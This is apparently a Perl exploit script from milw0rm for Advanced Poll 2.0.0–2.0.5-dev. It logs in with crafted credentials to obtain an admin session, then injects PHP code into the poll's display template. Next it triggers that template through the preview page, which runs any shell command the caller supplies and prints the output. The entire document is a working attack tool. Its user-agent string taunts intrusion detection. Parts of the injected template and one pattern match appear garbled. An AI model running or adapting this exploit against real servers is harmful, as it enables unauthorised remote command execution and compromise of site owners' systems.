#!/usr/bin/perl -w # Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE. # # date: 30/07/06 # # diwou # # PHCKSEC (c) 2001-2006. # # Hey, what a mad world! # use strict; use warnings; use LWP::UserAgent; use MD5; # # args: http://url/apoll_path cmd # # proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/' # url: http|https://tatget:(port)/phppoll/ # die("RTFC! ;)") unless(@ARGV>1); my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]); my %ipost= ( poll_tplset => 'default', 'tpl[display_head.html]' => < \$pollvars[title]

\$question

HEAD , action => '', tplset => 'default', tpl_type => 'display', session => '', uid => 1 ); my %epost= ( session => '', uid => 1, poll_tplst => 'default', tpl_type => 'display', ); my %zday= ( username => 'jakahw4nk4h', 'pollvars[poll_username]' => 'jakahw4nk4h', password => 'fuckoff', 'pollvars[poll_password]' => '' ); $zday{'pollvars[poll_password]'}=&md5($zday{password}); $agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter. #$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1"; $lwp=new LWP::UserAgent(); $lwp->agent($agent); $lwp->timeout(10); $lwp->protocols_allowed(['http','https']); if($ENV{PROXY}) { $lwp->proxy(['http','https'],$ENV{PROXY}); print "Using proxy ".$ENV{PROXY}."\n"; } $url.="/" if($url!~/\/$/); $url.="admin/index.php"; print "Doing some pretty with ".$url."...\n\n"; print "+ generating session...\n"; $out=$lwp->post($url,\%zday)->content(); if($out=~ /index\.php\?session=((.){32})/) { $ipost{'session'}=$epost{'session'}=$1; print " session: ".$ipost{'session'}."\n"; $url=~s/index\.php/admin_templates\.php/g; print "+ injecting diplay_head.html template...\n"; $out=$lwp->post($url,\%ipost)->content(); $epost{'action'}=$1 if($out=~ //); print " button: ".$epost{'action'}."\n"; $url=~s/admin_templates\.php/admin_preview\.php/g; print "+ executing...\n"; $out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content(); print "-- BOCE --\n"; foreach $out (split(/\n/,$out)) { $res=1,next if($out=~/BOCE/); $res=0,next if($out=~/EOCE/); print $out."\n" if($res); } print "-- EOCE --\n"; } else { print "don't worry, u can improve me! eh eh eh :D?\n"; } sub md5 { $_=new MD5; $_->add(@_); return unpack("H*",$_->digest()); } # milw0rm.com [2007-02-13]